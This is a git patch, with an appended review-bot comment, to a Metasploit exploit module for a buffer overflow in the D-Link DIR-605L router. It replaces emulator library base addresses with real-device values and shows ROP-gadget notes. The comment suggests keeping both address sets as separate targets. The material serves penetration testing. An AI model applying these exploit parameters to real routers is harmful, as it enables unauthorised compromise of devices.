From a00a813649e2d3604c465dc528663f16610f7a39 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 17 Oct 2013 22:34:54 -0500
Subject: [PATCH] Add real device libraries base addresses

---
 modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
index 1c441c0b93..ca1b997239 100644
--- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
+++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
@@ -47,8 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'DLink DIR-605L 1.13',
 {
 'Offset' => 94,
- 'LibcBase' => 0x4212e000, # QEMU environment
- 'ApmibBase' => 0x42095000, # QEMU environment
+ 'LibcBase' => 0x2ab86000, # According to Original Exploit by Craig Heffner
+ 'ApmibBase' => 0x2aaef000, # According to Original Exploit by Craig Heffner
+ #'LibcBase' => 0x4212e000, # QEMU environment
+ #'ApmibBase' => 0x42095000, # QEMU environment
 #LOAD:000248D4 li $a0, 1 ; set $a0 for the sleep() call
 #LOAD:000248D8 move $t9, $s1 ; $s1 is controlled after the overflow
 #LOAD:000248DC jalr $t9
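Review bot: The QEMU base addresses on the new side survive only as commented-out lines beneath the live `'LibcBase'`/`'ApmibBase'` keys, so switching between the emulated and the physical device means editing the module source; a second `Targets` entry (e.g. `'DLink DIR-605L 1.13 (QEMU)'` carrying `'LibcBase' => 0x4212e000, 'ApmibBase' => 0x42095000`) would let the operator choose it with `set TARGET` and keep both address sets runnable instead of one being dead text. The real-device values are attributed only to "Original Exploit by Craig Heffner", which does not tell a later maintainer which firmware image they were measured against or how to re-derive them when the library load layout differs; a comment along the lines of `# libc/apmib mmap bases observed on a stock DIR-605L 1.13 device; re-check via /proc/<pid>/maps if the return address misses` would make that explicit. Whether these addresses are stable across firmware builds (i.e. no ASLR / deterministic mmap order on the device) is inferred here rather than shown by the hunk, so state it only once confirmed. The `Targets` array and this target's hash both continue past the end of the hunk.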